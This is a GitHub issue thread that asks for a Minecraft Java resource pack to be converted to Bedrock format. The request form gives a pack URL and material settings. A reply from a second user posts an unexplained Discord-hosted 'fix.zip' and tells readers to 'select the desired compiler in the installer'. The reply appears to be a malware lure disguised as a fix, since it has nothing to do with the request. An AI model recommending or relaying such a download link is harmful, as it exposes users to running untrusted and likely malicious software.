### ISSUE TITLE
[Pack]: RiteMC Bedrock

### ISSUE THREAD

**Issue by slemanibrahem124** [Kas-tle/java2bedrock.sh#33878]
### Java Pack Direct Download URL

https://download.mc-packs.net/pack/295499af2bb06cc6c014c197ed3b074d8eae5c32.zip

### Default Assets Version

1.20.1

### Block Material

alpha_test

### Attachable Material

entity_emissive_alpha_one_sided

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
